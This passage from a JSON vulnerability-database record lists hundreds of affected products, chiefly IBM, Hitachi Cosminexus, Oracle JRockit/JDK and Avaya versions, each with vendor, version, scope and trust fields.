"3.2" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer light 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v07" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.16" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.15" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.2" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "cosminexus developer professional 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "sterling external authentication server patch ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.11103" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server standard 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.1" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus application server standard 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "soap gateway component of the ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "filenet content manager ga", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.13" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.8" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1" }, { "model": "cosminexus developer standard 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jrockit r28.2.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "cosminexus developer standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "cosminexus application server standard 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "java se embedded 7u51", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.5" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "cosminexus developer professional 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.40" }, { "model": "espace ivs v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "content foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "cosminexus developer professional 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.0" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "soap gateway component of the ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "runtimes for java technology sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud provisioning fp3 if0001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.071" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.11" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.061" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.41" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.62" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.12" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.32" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7.003" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus client 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.13" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "cosminexus client 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.4" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "cosminexus studio 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "content analytics with enterprise search", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.51" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.112" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.3" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.13" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.178" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "omnifind enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "runtimes for java technology sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus studio 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.53" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.7" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus application server standard 